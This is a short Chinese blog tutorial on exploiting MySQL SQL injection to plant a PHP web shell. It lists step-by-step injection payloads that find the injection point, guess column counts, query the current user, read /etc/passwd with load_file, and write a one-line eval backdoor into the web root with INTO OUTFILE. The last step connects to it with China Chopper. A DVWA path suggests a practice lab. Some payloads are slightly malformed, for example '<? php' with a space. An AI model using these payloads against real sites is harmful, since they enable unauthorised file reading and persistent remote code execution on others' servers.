MySQL注入之木马上传拿webshell

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/Liuhuaijin/article/details/77186544
 原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件 
1.首先查找SQL注入点
使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入
2.使用order by猜测字段数量
?id=1+order+by+2--+    //使用order by时,只有在使用比正确的值大时才会报错
3.使用union查询当前用户
?id=1+union+select+user(),2--+  //当前用户为root, 猜测可能是file权限
4.使用load_file()函数读取系统文件
?id=1' union select 1,load_file(/etc/passwd)--+ //linux系统
?id=1' union select 1,load_file('c:\\1.txt')--+ //windows系统 
5.使用select into outfile(dumpfile)命令写入一句话木马,木马<? php eval($_POST['JIM']);?>要进行16进制编码
?id=1+union+select+1,<? php eval($_POST['JIM']);?> into outfile '/var/www/dvwa/test.php'--+  //通过phpinfo文件获取web的物理路径
?id=1 union select 1,<? php eval($_POST['JIM']);?> into outfile 'c:\\2.txt'--+ //windows系统
6.中国菜刀连接
输入木马保存路径:/var/www/dvwa/test.php或c:\\2.txt

展开阅读全文

没有更多推荐了,返回首页